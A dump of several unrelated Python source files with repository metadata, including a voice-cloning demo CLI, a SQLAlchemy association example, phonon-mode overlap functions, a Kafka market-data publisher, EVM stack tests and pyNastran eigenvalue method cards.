del drug_pair_list[index]
filter_count += 1
else:
index += 1
return smiles_feature_list, interaction_label_list, drug_pair_list, filter_count
| 35.13125
| 94
| 0.68422
|
ba5f299afe1970b105ca9c78b8187cfb65cd88ce
| 11,407
|
py
|
Python
|
demo_cli.py
|
a-k-coder/Real-Time-Voice-Cloning
|
00f3c065d5c695352235614b22dba436f51c9936
|
[
"MIT"
] | null | null | null |
demo_cli.py
|
a-k-coder/Real-Time-Voice-Cloning
|
00f3c065d5c695352235614b22dba436f51c9936
|
[
"MIT"
] | null | null | null |
demo_cli.py
|
a-k-coder/Real-Time-Voice-Cloning
|
00f3c065d5c695352235614b22dba436f51c9936
|
[
"MIT"
] | null | null | null |
from encoder.params_model import model_embedding_size as speaker_embedding_size
from utils.argutils import print_args
from utils.modelutils import check_model_paths
from synthesizer.inference import Synthesizer
from encoder import inference as encoder
from vocoder import inference as vocoder
from pathlib import Path
import numpy as np
import soundfile as sf
import librosa
import argparse
import torch
import sys
import os
from audioread.exceptions import NoBackendError
if __name__ == '__main__':
## Info & args
parser = argparse.ArgumentParser(
formatter_class=argparse.ArgumentDefaultsHelpFormatter
)
parser.add_argument("-e", "--enc_model_fpath", type=Path,
default="encoder/saved_models/pretrained.pt",
help="Path to a saved encoder")
parser.add_argument("-s", "--syn_model_fpath", type=Path,
default="synthesizer/saved_models/pretrained/pretrained.pt",
help="Path to a saved synthesizer")
parser.add_argument("-v", "--voc_model_fpath", type=Path,
default="vocoder/saved_models/pretrained/pretrained.pt",
help="Path to a saved vocoder")
parser.add_argument("--cpu", action="store_true", help=\
"If True, processing is done on CPU, even when a GPU is available.")
parser.add_argument("--no_sound", action="store_true", help=\
"If True, audio won't be played.")
parser.add_argument("--seed", type=int, default=None, help=\
"Optional random number seed value to make toolbox deterministic.")
parser.add_argument("--no_mp3_support", action="store_true", help=\
"If True, disallows loading mp3 files to prevent audioread errors when ffmpeg is not installed.")
#
# Add arguments for path to reference voice file and text to be cloned.
#
parser.add_argument("--path", action="store_true", help="Reference voice: enter an audio filepath of a voice to be cloned (mp3, wav, m4a, flac, ...):\n")
parser.add_argument("--text", action="store_true", help="Write a sentence (+-20 words) to be synthesized:\n")
#
args = parser.parse_args()
print_args(args, parser)
if not args.no_sound:
import sounddevice as sd
if args.cpu:
# Hide GPUs from Pytorch to force CPU processing
os.environ["CUDA_VISIBLE_DEVICES"] = ""
if not args.no_mp3_support:
try:
librosa.load("samples/1320_00000.mp3")
except NoBackendError:
print("Librosa will be unable to open mp3 files if additional software is not installed.\n"
"Please install ffmpeg or add the '--no_mp3_support' option to proceed without support for mp3 files.")
exit(-1)
print("Running a test of your configuration...\n")
if torch.cuda.is_available():
device_id = torch.cuda.current_device()
gpu_properties = torch.cuda.get_device_properties(device_id)
## Print some environment information (for debugging purposes)
print("Found %d GPUs available. Using GPU %d (%s) of compute capability %d.%d with "
"%.1fGb total memory.\n" %
(torch.cuda.device_count(),
device_id,
gpu_properties.name,
gpu_properties.major,
gpu_properties.minor,
gpu_properties.total_memory / 1e9))
else:
print("Using CPU for inference.\n")
## Remind the user to download pretrained models if needed
check_model_paths(encoder_path=args.enc_model_fpath,
synthesizer_path=args.syn_model_fpath,
vocoder_path=args.voc_model_fpath)
## Load the models one by one.
print("Preparing the encoder, the synthesizer and the vocoder...")
encoder.load_model(args.enc_model_fpath)
synthesizer = Synthesizer(args.syn_model_fpath)
vocoder.load_model(args.voc_model_fpath)
## Run a test
print("Testing your configuration with small inputs.")
# Forward an audio waveform of zeroes that lasts 1 second. Notice how we can get the encoder's
# sampling rate, which may differ.
# If you're unfamiliar with digital audio, know that it is encoded as an array of floats
# (or sometimes integers, but mostly floats in this projects) ranging from -1 to 1.
# The sampling rate is the number of values (samples) recorded per second, it is set to
# 16000 for the encoder. Creating an array of length <sampling_rate> will always correspond
# to an audio of 1 second.
print("\tTesting the encoder...")
encoder.embed_utterance(np.zeros(encoder.sampling_rate))
# Create a dummy embedding. You would normally use the embedding that encoder.embed_utterance
# returns, but here we're going to make one ourselves just for the sake of showing that it's
# possible.
embed = np.random.rand(speaker_embedding_size)
# Embeddings are L2-normalized (this isn't important here, but if you want to make your own
# embeddings it will be).
embed /= np.linalg.norm(embed)
# The synthesizer can handle multiple inputs with batching. Let's create another embedding to
# illustrate that
embeds = [embed, np.zeros(speaker_embedding_size)]
texts = ["test 1", "test 2"]
print("\tTesting the synthesizer... (loading the model will output a lot of text)")
mels = synthesizer.synthesize_spectrograms(texts, embeds)
# The vocoder synthesizes one waveform at a time, but it's more efficient for long ones. We
# can concatenate the mel spectrograms to a single one.
mel = np.concatenate(mels, axis=1)
# The vocoder can take a callback function to display the generation. More on that later. For
# now we'll simply hide it like this:
no_action = lambda *args: None
print("\tTesting the vocoder...")
# For the sake of making this test short, we'll pass a short target length. The target length
# is the length of the wav segments that are processed in parallel. E.g. for audio sampled
# at 16000 Hertz, a target length of 8000 means that the target audio will be cut in chunks of
# 0.5 seconds which will all be generated together. The parameters here are absurdly short, and
# that has a detrimental effect on the quality of the audio. The default parameters are
# recommended in general.
vocoder.infer_waveform(mel, target=200, overlap=50, progress_callback=no_action)
print("All test passed! You can now synthesize speech.\n\n")
## Interactive speech generation
print("This is a GUI-less example of interface to SV2TTS. The purpose of this script is to "
"show how you can interface this project easily with your own. See the source code for "
"an explanation of what is happening.\n")
print("Interactive generation loop")
num_generated = 0
while True:
try:
# Get the reference audio filepath
message = "Reference voice: enter an audio filepath of a voice to be cloned (mp3, " \
"wav, m4a, flac, ...):\n"
# Uncomment next line to take path as input on console
# in_fpath = Path(input(message).replace("\"", "").replace("\'", ""))
# Take path as argument
in_fpath = os.path.exists(args.path)
if in_fpath.suffix.lower() == ".mp3" and args.no_mp3_support:
print("Can't Use mp3 files please try again:")
continue
## Computing the embedding
# First, we load the wav using the function that the speaker encoder provides. This is
# important: there is preprocessing that must be applied.
# The following two methods are equivalent:
# - Directly load from the filepath:
preprocessed_wav = encoder.preprocess_wav(in_fpath)
# - If the wav is already loaded:
original_wav, sampling_rate = librosa.load(str(in_fpath))
preprocessed_wav = encoder.preprocess_wav(original_wav, sampling_rate)
print("Loaded file succesfully")
# Then we derive the embedding. There are many functions and parameters that the
# speaker encoder interfaces. These are mostly for in-depth research. You will typically
# only use this function (with its default parameters):
embed = encoder.embed_utterance(preprocessed_wav)
print("Created the embedding")
## Generating the spectrogram
# text = input("Write a sentence (+-20 words) to be synthesized:\n")
# Take text input as an argument
text = args.text
# If seed is specified, reset torch seed and force synthesizer reload
if args.seed is not None:
torch.manual_seed(args.seed)
synthesizer = Synthesizer(args.syn_model_fpath)
# The synthesizer works in batch, so you need to put your data in a list or numpy array
texts = [text]
embeds = [embed]
# If you know what the attention layer alignments are, you can retrieve them here by
# passing return_alignments=True
specs = synthesizer.synthesize_spectrograms(texts, embeds)
spec = specs[0]
print("Created the mel spectrogram")
## Generating the waveform
print("Synthesizing the waveform:")
# If seed is specified, reset torch seed and reload vocoder
if args.seed is not None:
torch.manual_seed(args.seed)
vocoder.load_model(args.voc_model_fpath)
# Synthesizing the waveform is fairly straightforward. Remember that the longer the
# spectrogram, the more time-efficient the vocoder.
generated_wav = vocoder.infer_waveform(spec)
## Post-generation
# There's a bug with sounddevice that makes the audio cut one second earlier, so we
# pad it.
generated_wav = np.pad(generated_wav, (0, synthesizer.sample_rate), mode="constant")
# Trim excess silences to compensate for gaps in spectrograms (issue #53)
generated_wav = encoder.preprocess_wav(generated_wav)
# Play the audio (non-blocking)
if not args.no_sound:
try:
sd.stop()
sd.play(generated_wav, synthesizer.sample_rate)
except sd.PortAudioError as e:
print("\nCaught exception: %s" % repr(e))
print("Continuing without audio playback. Suppress this message with the \"--no_sound\" flag.\n")
except:
raise
# Save it on the disk
filename = "demo_output_%02d.wav" % num_generated
print(generated_wav.dtype)
sf.write(filename, generated_wav.astype(np.float32), synthesizer.sample_rate)
num_generated += 1
print("\nSaved output as %s\n\n" % filename)
except Exception as e:
print("Caught exception: %s" % repr(e))
print("Restarting\n")
| 47.928571
| 157
| 0.638731
|
a175b1b8974c5224d8d788d0f726fabb2ee5cddc
| 3,090
|
py
|
Python
|
examples/association/basic_association.py
|
paylogic/sqlalchemy
|
876a487bf06a038efde7d46ce09e253b9247aae5
|
[
"MIT"
] | 2
|
2015-11-07T11:55:45.000Z
|
2017-09-04T07:56:34.000Z
|
examples/association/basic_association.py
|
mitsuhiko/sqlalchemy
|
5a6895471fb6bf9afe9bdf017f1fa2c6246ae303
|
[
"MIT"
] | null | null | null |
examples/association/basic_association.py
|
mitsuhiko/sqlalchemy
|
5a6895471fb6bf9afe9bdf017f1fa2c6246ae303
|
[
"MIT"
] | null | null | null |
"""A basic example of using the association object pattern.
The association object pattern is a form of many-to-many which
associates additional data with each association between parent/child.
The example illustrates an "order", referencing a collection
of "items", with a particular price paid associated with each "item".
"""
from datetime import datetime
from sqlalchemy import (create_engine, MetaData, Table, Column, Integer,
String, DateTime, Float, ForeignKey, and_)
from sqlalchemy.orm import mapper, relationship, Session
from sqlalchemy.ext.declarative import declarative_base
Base = declarative_base()
class Order(Base):
__tablename__ = 'order'
order_id = Column(Integer, primary_key=True)
customer_name = Column(String(30), nullable=False)
order_date = Column(DateTime, nullable=False, default=datetime.now())
order_items = relationship("OrderItem", cascade="all, delete-orphan",
backref='order')
def __init__(self, customer_name):
self.customer_name = customer_name
class Item(Base):
__tablename__ = 'item'
item_id = Column(Integer, primary_key=True)
description = Column(String(30), nullable=False)
price = Column(Float, nullable=False)
def __init__(self, description, price):
self.description = description
self.price = price
def __repr__(self):
return 'Item(%r, %r)' % (
self.description, self.price
)
class OrderItem(Base):
__tablename__ = 'orderitem'
order_id = Column(Integer, ForeignKey('order.order_id'), primary_key=True)
item_id = Column(Integer, ForeignKey('item.item_id'), primary_key=True)
price = Column(Float, nullable=False)
def __init__(self, item, price=None):
self.item = item
self.price = price or item.price
item = relationship(Item, lazy='joined')
if __name__ == '__main__':
engine = create_engine('sqlite://')
Base.metadata.create_all(engine)
session = Session(engine)
# create catalog
tshirt, mug, hat, crowbar = (
Item('SA T-Shirt', 10.99),
Item('SA Mug', 6.50),
Item('SA Hat', 8.99),
Item('MySQL Crowbar', 16.99)
)
session.add_all([tshirt, mug, hat, crowbar])
session.commit()
# create an order
order = Order('john smith')
# add three OrderItem associations to the Order and save
order.order_items.append(OrderItem(mug))
order.order_items.append(OrderItem(crowbar, 10.99))
order.order_items.append(OrderItem(hat))
session.add(order)
session.commit()
# query the order, print items
order = session.query(Order).filter_by(customer_name='john smith').one()
print([(order_item.item.description, order_item.price)
for order_item in order.order_items])
# print customers who bought 'MySQL Crowbar' on sale
q = session.query(Order).join('order_items', 'item')
q = q.filter(and_(Item.description == 'MySQL Crowbar',
Item.price > OrderItem.price))
print([order.customer_name for order in q])
| 32.526316
| 78
| 0.677023
|
9de5c852b2a84ccea83f0127e99b3af286600088
| 10,671
|
py
|
Python
|
PhononModes/match_modes.py
|
Huaguiyuan/PhononModes
|
71319b8b15f25530e4ef6a2c0789ad94c80f801d
|
[
"MIT"
] | 9
|
2015-02-10T15:18:52.000Z
|
2020-11-19T11:08:31.000Z
|
PhononModes/match_modes.py
|
jeffwdoak/PhononModes
|
71319b8b15f25530e4ef6a2c0789ad94c80f801d
|
[
"MIT"
] | null | null | null |
PhononModes/match_modes.py
|
jeffwdoak/PhononModes
|
71319b8b15f25530e4ef6a2c0789ad94c80f801d
|
[
"MIT"
] | 2
|
2018-07-17T12:16:17.000Z
|
2019-03-19T09:34:39.000Z
|
#!/usr/bin/env python
"""
Set of functions to compare phonon normal modes and frequencies between two
related structures to determine mode overlaps and anharmonic coupling constants.
These functions were used in Doak, Wolverton, Ozolins, Phys. Rev. B, 92, 174306
(2015) to calcuate Eq. 13--15.
When running this script, two command-line arguments are required:
1. the path to a directory containing a phonon supercell calculation of the
system at a saddle-point of a double-well mode.
2. the path to a directory containing a phonon supercell calculation of the
system at the bottom of double-well mode.
"""
import sys
import numpy as np
from phononmodes import *
saddledir = str(sys.argv[1])
welldir = str(sys.argv[2])
saddle = PhononModes(saddledir+"/phonons.out", saddledir+"/apos.dat")
well = PhononModes(welldir+"/phonons.out", welldir+"/apos.dat")
def test(i):
"""
Calculate and compare participation ratios of modes with the same index in
two calculations. Prints comparison to screen.
Parameters
----------
i : int
Index of mode for which to calculate participation ratios in both
calculations.
"""
for j in range(well.num_modes):
sp = saddle.participation_ratio(i)
wp = well.participation_ratio(j)
prod = np.dot(saddle.normal_modes[i].flatten(), well.normal_modes[j].flatten())
print i, j, sp, wp, sp-wp, prod
def transformation_matrix(saddle, well):
"""
Transformation matrix between two sets of normal mode eigenvectors.
Write each normal mode of structure `saddle` as a linear combination of
normal modes of the structure `saddle`: saddle_i = sum_j(A_ij*well_j)
Transformation matrix, A_ij, gives the coefficients of this expansion.
Parameters
----------
saddle, well : PhononMode objects
PhononModes for the saddle-point calculation and well-bottom
calculations, respectively.
Returns
-------
A : numpy array
Transformation matrix between modes of saddle and modes of well.
"""
A = np.dot(well.flattened_modes(), saddle.flattened_modes().T)
return A
def D1(omega, omega_prime, sigma, initial_modes, final_modes):
"""
Map frequencies from one structure onto another structure.
From Vinay Hegde (hegdevinayi).
Function from Vinay to map frequencies from one structure onto another
structure.
Parameters
----------
omega, omega_prime : float
Phonon frequencies to compare (units of cm**-1)
sigma : float
Tolerance below which to consider two frequencies as being similar.
initial_modes, final_modes : PhononMode objects
PhononModes for the two structures being compared.
Returns
-------
D : float
Overlap between modes with frequencies omega in structure 1 and modes
with frequencies omega_prime in structure 2 (units of Angstroms).
"""
D = 0.0
for i in range(initial_modes.num_modes):
for j in range(final_modes.num_modes):
if np.abs(omega - initial_modes.freqs[i]) < sigma:
if np.abs(omega_prime - final_modes.freqs[j]) < sigma:
D += (np.dot(initial_modes.normal_modes[i].flatten(),
final_modes.normal_modes[j].flatten()
)**2)
return D
def D0(mu, nu, initial, final):
"""
Overlap between two modes in different structures.
Calculates the overlap between mode index mu of structure intial and mode
index nu of structure final.
Parameters
----------
mu, nu : int
Indices of phonon modes in structures `intial` and `final`,
respectively.
initial, final : PhononMode objects
PhononModes for the two structures to be compared.
Returns
-------
D : float
Overlap between modes (units of Angstroms).
"""
D = np.dot(initial.normal_modes[mu].flatten(), final.normal_modes[nu].flatten())**2
return D
def anharmonic_coupling0(well, saddle):
"""
Anharmonic coupling constants between modes of two structures.
Coupling constants are calculated from (Eq. 15 of Doak, PRB, 174306, 2015):
a = (w_w**2 - w_s**2)*2/Pmax**2, Pmax=1
Parameters
----------
well, saddle : PhononMode objects
PhononModes for the two structures to be compared.
Returns
-------
a : numpy array
Anharmonic coupling constants between modes of `well` and `saddle`
(units of cm**-2). len(a) == saddle.num_modes
"""
def square_freqs(freqs):
square = np.zeros_like(freqs)
for i in range(len(freqs)):
if np.abs(freqs[i]) < 1.0:
square[i] = 0.0
elif freqs[i] < 0.0:
square[i] = -(freqs[i]**2)
else:
square[i] = freqs[i]**2
return square
well_freqs_squared = square_freqs(well.freqs)
saddle_freqs_squared = square_freqs(saddle.freqs)
a = np.zeros(saddle.num_modes)
for i in range(saddle.num_modes):
a[i] = (well_freqs_squared[i] - saddle_freqs_squared[i])*2
return a
def anharmonic_coupling1(well, saddle):
"""
Anharmonic coupling constants between modes of two structures with acoustic
modes removed.
Coupling constants are calculated from (Eq. 15 of Doak, PRB, 174306, 2015):
a = (w_w**2 - w_s**2)*2/Pmax**2, Pmax=1
Coupling constants are not calculated for the acoustic modes of the two
structures.
Parameters
----------
well, saddle : PhononMode objects
PhononModes for the two structures to be compared.
Returns
-------
a : numpy array
Anharmonic coupling constants between modes of `well` and `saddle`
(units of cm**-2). len(a) == saddle.num_modes
"""
def square_freqs(freqs):
square = np.zeros(len(freqs)-3)
j = 0
for i in range(len(freqs)):
if np.abs(freqs[i]) < 1.0:
continue
elif freqs[i] < 0.0:
square[j] = -(freqs[i]**2)
j += 1
else:
square[j] = freqs[i]**2
j += 1
return square
well_freqs_squared = square_freqs(well.freqs)
saddle_freqs_squared = square_freqs(saddle.freqs)
a = np.zeros(saddle.num_modes-3)
for i in range(saddle.num_modes-3):
a[i] = (well_freqs_squared[i] - saddle_freqs_squared[i])*2
return a
def whittle_overlap(saddle, well, iter_):
"""
Remove a number of modes with the highest overlap between two structures.
Find and remove the saddle-point and well-bottom modes with the
highest overlap (D0) from the overlap matrix, `iter_` times.
Parameters
----------
saddle, well : PhononMode objects
PhononModes of the two structures to compare.
iter_ : int
Number of modes to identify and remove based on having the highest
overlap between structuers.
Returns
-------
overlap : numpy array
Overlap between remaining modes of the two structures (units of
Angstroms).
welltosaddle : numpy array
Array indicating which modes of `saddle` overlap most with modes of
`well`. For each mode in `saddle`, this array contains the index of the
mode in `well` that has the greatest overlap with it, up to `iter_`
modes. If the mode in `saddle` does not have an overlap in the `iter_`
highest overlaps, the value of its index in `welltosaddle` is 0.
len(welltosaddle) == saddle.num_modes
"""
# initial overlap matrix construction
nmodes = saddle.num_modes
saddlefreqs = np.copy(saddle.freqs)
wellfreqs = np.copy(well.freqs)
overlap = [D0(i, j, saddle, well) for i in range(nmodes) for j in range(nmodes)]
overlap = np.reshape(overlap, (nmodes, nmodes))
argoverlap = [[i, j] for i in range(nmodes) for j in range(nmodes)]
argoverlap = np.reshape(argoverlap, (nmodes, nmodes, 2))
welltosaddle = np.zeros(nmodes)
# repeatedly find the maximum overlap and remove those two modes from the
# saddle and well lists
for i in range(iter_):
max = np.max(overlap)
index = np.unravel_index(np.argmax(overlap), np.shape(overlap))
welltosaddle[argoverlap[index[0], index[1], 0]] = int(argoverlap[index[0], index[1], 1])
print i, max, index, saddlefreqs[index[0]], wellfreqs[index[1]]
overlap = np.delete(overlap, index[0], 0)
overlap = np.delete(overlap, index[1], 1)
argoverlap = np.delete(argoverlap, index[0], 0)
argoverlap = np.delete(argoverlap, index[1], 1)
saddlefreqs = np.delete(saddlefreqs, index[0])
wellfreqs = np.delete(wellfreqs, index[1])
return overlap, welltosaddle
def square_freqs(freqs):
"""
Square phonon frequencies, accounting for imaginary modes.
Squares each phonon frequency. Frequencies of imaginary modes are set to be
negative. Square frequencies of acoustic modes are set to zero.
Parameters
----------
freqs : numpy array
Array of phonon frequencies in cm**-1. Imaginary modes have negative
frequencies.
Returns
-------
square : numpy array
Array of squared frequencies. Imaginary modes have negative square
frequencies.
len(square) == len(freqs)
"""
square = np.zeros_like(freqs)
for i in range(len(freqs)):
if np.abs(freqs[i]) < 1.0:
square[i] = 0.0
elif freqs[i] < 0.0:
square[i] = -(freqs[i]**2)
else:
square[i] = freqs[i]**2
return square
def rotated_freqs(well, saddle):
"""
Squared frequencies of modes of `well` acting on system `saddle`.
Calculate the squared frequencies of the saddle system normal mode
displacements acting on the dynamical matrix of the well system. Equation
14 of Doak, PRB 174306, 2015.
Parameters
----------
well, saddle : PhononMode objects
PhononModes of two structures to compare. Dynamical matrix of `well`
will be used for comparison.
Returns
-------
newfreqs : numpy array
Array of effective square phonon frequencies (units of cm**-2) of modes
of structure `saddle` acting on system `well`.
"""
A = transformation_matrix(saddle, well)
omegasquare = square_freqs(saddle.freqs)
newfreqs = np.zeros_like(well.freqs)
for i in range(len(well.freqs)):
for j in range(len(saddle.freqs)):
newfreqs[i] += omegasquare[j]*A[i, j]**2
newfreqs[i] = np.sqrt(newfreqs[i])
return newfreqs
| 33.242991
| 96
| 0.639022
|
b39aa825baf0fc99f1464458369dd3da00135f45
| 1,721
|
py
|
Python
|
dxfeed/publish_order_table.py
|
hythloda/redpanda-dxfeed-financial-data
|
4d33ba58db7bce79144721ca49ee17ab66181b37
|
[
"Apache-2.0"
] | 3
|
2021-12-14T13:06:41.000Z
|
2022-02-17T19:34:41.000Z
|
dxfeed/publish_order_table.py
|
BenPope/redpanda-dxfeed-financial-data
|
4d33ba58db7bce79144721ca49ee17ab66181b37
|
[
"Apache-2.0"
] | null | null | null |
dxfeed/publish_order_table.py
|
BenPope/redpanda-dxfeed-financial-data
|
4d33ba58db7bce79144721ca49ee17ab66181b37
|
[
"Apache-2.0"
] | 2
|
2021-12-22T18:00:15.000Z
|
2022-01-18T14:36:38.000Z
|
from confluent_kafka import Producer
from datetime import datetime
import dxfeed as dx
import json
import time
import re
# Sleep to ensure server has time to run
time.sleep(3)
producer = Producer({
'bootstrap.servers': 'redpanda:29092',
})
endpoint = dx.Endpoint('demo.dxfeed.com:7300')
symbols = ['SPY', 'AAPL', 'IBM', 'MSFT', 'DIA', 'XLF', 'GOOG', 'AMZN', 'TSLA', 'SPX', 'HPQ', 'CSCO', 'INTC', 'AXP']
types = ['Order']
class Subscriptions(object):
def __init__(self, type):
self.sub = endpoint.create_subscription(type)
self.handler = dx.DefaultHandler()
self.sub.set_event_handler(self.handler)
self.sub = self.sub.add_symbols(symbols)
self.handler = self.sub.get_event_handler()
self.topic_name = type
my_subscriptions = []
for i in range(len(types)):
my_subscriptions.append(Subscriptions(types[i]))
time.sleep(1)
def clean_order(input):
data = {
"Symbol": input[0],
"EventFlags": input[1],
"Index": input[2],
"Timestamp": input[3],
"Sequence": input[4],
"Price": input[5],
"Size": input[6],
"Count": input[7],
"Scope": input[8],
"Side": input[9],
"ExchangeCode": input[10],
"Source": input[11],
"MarketMaker": input[12],
"SpreadSymbol": input[13]
}
producer.produce(topic= 'Order', key=None, value=json.dumps(data))
producer.flush()
while True:
for obj in my_subscriptions:
data = obj.handler.get_dataframe().to_json(orient ='values')
json_dictionary = json.loads(data)
for key in json_dictionary:
if(obj.topic_name == 'Order'):
formatted = clean_order(key)
| 26.075758
| 115
| 0.611854
|
1e818395304c6189ea62a8ff326152cf7c68f3cf
| 3,019
|
py
|
Python
|
tests/core/stack/test_stack.py
|
jin10086/py-evm
|
da04e8de42fdbf3bc5ca596f5f6b3d810c1afea8
|
[
"MIT"
] | 5
|
2018-09-28T20:01:42.000Z
|
2022-02-22T19:54:46.000Z
|
tests/core/stack/test_stack.py
|
jin10086/py-evm
|
da04e8de42fdbf3bc5ca596f5f6b3d810c1afea8
|
[
"MIT"
] | null | null | null |
tests/core/stack/test_stack.py
|
jin10086/py-evm
|
da04e8de42fdbf3bc5ca596f5f6b3d810c1afea8
|
[
"MIT"
] | 2
|
2018-12-09T15:58:11.000Z
|
2020-09-29T07:10:21.000Z
|
import pytest
from eth_utils import (
ValidationError,
)
from eth.vm.stack import (
Stack,
)
from eth.exceptions import (
FullStack,
InsufficientStack,
)
from eth.constants import (
UINT256,
BYTES,
SECPK1_N,
)
@pytest.fixture
def stack():
return Stack()
@pytest.mark.parametrize(
("value,is_valid"),
(
(-1, False),
(0, True),
(1, True),
(2**256 - 1, True),
(2**256, False),
('abcde', False),
(b'abcde', True),
(b'100100100100100100100100100100100', False),
)
)
def test_push_only_pushes_valid_stack_items(stack, value, is_valid):
if is_valid:
stack.push(value)
assert stack.values == [value]
else:
with pytest.raises(ValidationError):
stack.push(value)
def test_push_does_not_allow_stack_to_exceed_1024_items(stack):
for num in range(1024):
stack.push(num)
assert len(stack.values) == 1024
with pytest.raises(FullStack):
stack.push(1025)
def test_dup_does_not_allow_stack_to_exceed_1024_items(stack):
stack.push(1)
for num in range(1023):
stack.dup(1)
assert len(stack.values) == 1024
with pytest.raises(FullStack):
stack.dup(1)
@pytest.mark.parametrize(
("items,type_hint"),
(
([1], UINT256),
([1, 2, 3], UINT256),
([b'1', b'10', b'101', b'1010'], BYTES)
)
)
def test_pop_returns_latest_stack_item(stack, items, type_hint):
for each in items:
stack.push(each)
assert stack.pop(num_items=1, type_hint=type_hint) == items[-1]
@pytest.mark.parametrize(
("value,type_hint,type,is_valid"),
(
(1, UINT256, int, True),
(b'101', BYTES, bytes, True),
(1, SECPK1_N, int, False)
)
)
def test_pop_typecasts_correctly_based_off_type_hint(stack, value, type_hint, type, is_valid):
stack.push(value)
if is_valid:
assert isinstance(stack.pop(num_items=1, type_hint=type_hint), type)
else:
with pytest.raises(TypeError):
stack.pop(type_hint=type_hint)
def test_swap_operates_correctly(stack):
for num in range(5):
stack.push(num)
assert stack.values == [0, 1, 2, 3, 4]
stack.swap(3)
assert stack.values == [0, 4, 2, 3, 1]
stack.swap(1)
assert stack.values == [0, 4, 2, 1, 3]
def test_dup_operates_correctly(stack):
for num in range(5):
stack.push(num)
assert stack.values == [0, 1, 2, 3, 4]
stack.dup(1)
assert stack.values == [0, 1, 2, 3, 4, 4]
stack.dup(5)
assert stack.values == [0, 1, 2, 3, 4, 4, 1]
def test_pop_raises_InsufficientStack_appropriately(stack):
with pytest.raises(InsufficientStack):
stack.pop(num_items=1, type_hint=UINT256)
def test_swap_raises_InsufficientStack_appropriately(stack):
with pytest.raises(InsufficientStack):
stack.swap(0)
def test_dup_raises_InsufficientStack_appropriately(stack):
with pytest.raises(InsufficientStack):
stack.dup(0)
| 23.403101
| 94
| 0.632329
|
ad4857be3cd7c63e0f8166b9b7e168f046a93770
| 41,916
|
py
|
Python
|
pyNastran/bdf/cards/methods.py
|
SteveDoyle2/pyNastran
|
399a63447517829f665e58487cdcae326447ce36
|
[
"BSD-3-Clause"
] | 293
|
2015-03-22T20:22:01.000Z
|
2022-03-14T20:28:24.000Z
|
pyNastran/bdf/cards/methods.py
|
sean-engelstad/pyNastran
|
90f957887a4f68f8e58b07c15e1ac69c66b9c6f4
|
[
"BSD-3-Clause"
] | 512
|
2015-03-14T18:39:27.000Z
|
2022-03-31T16:15:43.000Z
|
pyNastran/bdf/cards/methods.py
|
sean-engelstad/pyNastran
|
90f957887a4f68f8e58b07c15e1ac69c66b9c6f4
|
[
"BSD-3-Clause"
] | 136
|
2015-03-19T03:26:06.000Z
|
2022-03-25T22:14:54.000Z
|
# pylint: disable=C0103,R0902,R0904,R0914
"""
All method cards are defined in this file. This includes:
* EIGB
* EIGC
* EIGR
* EIGP
* EIGRL
All cards are Method objects.
"""
from __future__ import annotations
from typing import TYPE_CHECKING
from pyNastran.bdf.field_writer_8 import set_blank_if_default
from pyNastran.bdf.cards.base_card import BaseCard
from pyNastran.bdf.bdf_interface.assign_type import (
integer, integer_or_blank, double, double_or_blank, string, string_or_blank,
parse_components, components_or_blank, integer_double_string_or_blank, blank,
interpret_value)
from pyNastran.bdf.field_writer_8 import print_card_8
from pyNastran.bdf.field_writer_16 import print_card_16
if TYPE_CHECKING: # pragma: no cover
from pyNastran.bdf.bdf import BDF
class Method(BaseCard):
"""
Generic class for all methods.
Part of self.methods
"""
def __init__(self):
pass
class EIGB(Method):
"""Defines data needed to perform buckling analysis"""
type = 'EIGB'
@classmethod
def _init_from_empty(cls):
sid = 1
method = 'INV'
G = 1
C = 1
norm = 'MAX'
L1 = 1.0
L2 = 2.0
nep = 10
ndp = 20
ndn = 30
return EIGB(sid, method, L1, L2, nep, ndp, ndn, norm, G, C, comment='')
def __init__(self, sid, method, L1, L2, nep, ndp, ndn, norm, G, C, comment=''):
Method.__init__(self)
if comment:
self.comment = comment
#: Set identification number. (Unique Integer > 0)
self.sid = sid
#: Method of eigenvalue extraction. (Character: 'INV' for inverse
#: power method or 'SINV' for enhanced inverse power method.)
#: apparently it can also be blank...
self.method = method
#: Eigenvalue range of interest. (Real, L1 < L2)
self.L1 = L1
self.L2 = L2
#: Estimate of number of roots in positive range not used for
#: METHOD = 'SINV'. (Integer > 0)
self.nep = nep
#: Desired number of positive and negative roots.
#: (Integer>0; Default = 3*NEP)
self.ndp = ndp
self.ndn = ndn
#: Method for normalizing eigenvectors.
#: ('MAX' or 'POINT';Default='MAX')
self.norm = norm
self.G = G
self.C = C
if not self.L1 < self.L2:
msg = 'L1=%s L2=%s; L1<L2 is required' % (self.L1, self.L2)
raise RuntimeError(msg)
if self.method not in ['INV', 'SINV', None]:
msg = 'method must be INV or SINV. method=%r' % self.method
raise RuntimeError(msg)
@classmethod
def add_card(cls, card, comment=''):
"""
Adds an EIGB card from ``BDF.add_card(...)``
Parameters
----------
card : BDFCard()
a BDFCard object
comment : str; default=''
a comment for the card
"""
sid = integer(card, 1, 'sid')
method = string_or_blank(card, 2, 'method')
L1 = double(card, 3, 'L1')
L2 = double(card, 4, 'L2')
nep = integer_or_blank(card, 5, 'nep', 0)
ndp = integer_or_blank(card, 6, 'ndp', 3 * nep)
ndn = integer_or_blank(card, 7, 'ndn', 3 * nep)
norm = string_or_blank(card, 9, 'norm', 'MAX')
if norm == 'POINT':
G = integer(card, 10, 'G')
C = parse_components(card, 11, 'C', None)
else:
G = integer_or_blank(card, 10, 'G')
C = components_or_blank(card, 11, 'C', None)
assert len(card) <= 12, f'len(EIGB card) = {len(card):d}\ncard={card}'
return EIGB(sid, method, L1, L2, nep, ndp, ndn, norm, G, C,
comment=comment)
def cross_reference(self, model: BDF) -> None:
pass
def raw_fields(self):
list_fields = ['EIGB', self.sid, self.method, self.L1, self.L2, self.nep,
self.ndp, self.ndn, None, self.norm, self.G, self.C]
return list_fields
def repr_fields(self):
#method = set_blank_if_default(self.method,'INV')
nep = set_blank_if_default(self.nep, 0)
ndp = set_blank_if_default(self.ndp, 3 * self.nep)
ndn = set_blank_if_default(self.ndn, 3 * self.nep)
norm = set_blank_if_default(self.norm, 'MAX')
list_fields = ['EIGB', self.sid, self.method, self.L1, self.L2, nep, ndp,
ndn, None, norm, self.G, self.C]
return list_fields
def write_card(self, size: int=8, is_double: bool=False) -> str:
card = self.repr_fields()
if size == 8:
return self.comment + print_card_8(card)
return self.comment + print_card_16(card)
class EIGC(Method):
"""
Defines data needed to perform complex eigenvalue analysis
.. todo: not done
``inverse power``
+------+---------+---------+---------+---------+---------+---------+-----+
| 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 |
+======+=========+=========+=========+=========+=========+=========+=====+
